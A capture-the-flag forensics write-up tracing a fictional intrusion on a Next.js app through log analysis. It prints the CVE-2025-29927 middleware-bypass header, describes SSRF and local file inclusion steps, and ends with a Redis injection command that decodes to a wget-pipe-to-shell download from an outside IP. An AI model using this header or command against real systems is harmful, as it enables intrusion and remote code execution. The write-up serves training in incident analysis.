NeuroSync-D

CHALLENGE DESCRIPTION

NeuroSync™ is a leading suite of products focusing on developing cutting edge medical BCI devices, designed by the Korosaki Coorporaton. Recently, an APT group targeted them and was able to infiltrate their infrastructure and is now moving laterally to compromise more systems. It appears that they have even managed to hijack a large number of online devices by exploiting an N-day vulnerability. Your task is to find out how they were able to compromise the infrastructure and understand how to secure it.

SOLUTION

What version of Next.js is the application using?

grep -a10 -i 'next.js' * 

Answer

15.1.0

What local port is the Next.js-based application running on?

Answer

3000

A critical Next.js vulnerability was released in March 2025, and this version appears to be affected. What is the CVE identifier for this vulnerability?

Search CVE Next.js 2025 on Google

Answer

CVE-2025-29927

The attacker tried to enumerate some static files that are typically available in the Next.js framework, most likely to retrieve its version. What is the first file he could get?

Hint: Look for web requests with HTTP status 200.

We just need to see what the first file is, so we use head

grep  -i '200' * | head

Answer

main-app.js

Then the attacker appears to have found an endpoint that is potentially affected by the previously identified vulnerability. What is that endpoint?

We can get the answer from above

Answer

/api/bci/analytics

How many requests to this endpoint have resulted in an “Unauthorized” response?

Hint: Look for web requests with HTTP status 401.

grep  -i '401' *

Answer

5

When is a successful response received from the vulnerable endpoint, meaning that the middleware has been bypassed?

We can see the last failed request is 2025-04-01 11:38:04, so we can look from that timestamp.

Answer

2025-04-01 11:38:05

Given the previous failed requests, what will most likely be the final value for the vulnerable header used to exploit the vulnerability and bypass the middleware?

grep  -i 'middleware' * 

Answer

x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware

The attacker chained the vulnerability with an SSRF attack, which allowed them to perform an internal port scan and discover an internal API. On which port is the API accessible?

grep  -i 'port' *

Answer

4000

After the port scan, the attacker starts a brute-force attack to find some vulnerable endpoints in the previously identified API. Which vulnerable endpoint was found?

Answer

/logs

When the vulnerable endpoint found was used maliciously for the first time?

Answer

2025-04-01 11:39:01

What is the attack name the endpoint is vulnerable to?

Answer

Local File Inclusion

What is the name of the file that was targeted the last time the vulnerable endpoint was exploited?

Answer

secret.key

Finally, the attacker uses the sensitive information obtained earlier to create a special command that allows them to perform Redis injection and gain RCE on the system. What is the command string?

grep  -i '|' * 

Answer

OS_EXEC|d2dldCBodHRwOi8vMTg1LjIwMi4yLjE0Ny9oNFBsbjQvcnVuLnNoIC1PLSB8IHNo|f1f0c1feadb5abc79e700cac7ac63cccf91e818ecf693ad7073e3a448fa13bbb

Once decoded, what is the command?

It is a Base64, decode it by base64 -d

Answer

wget http://185.202.2.147/h4Pln4/run.sh -O- | sh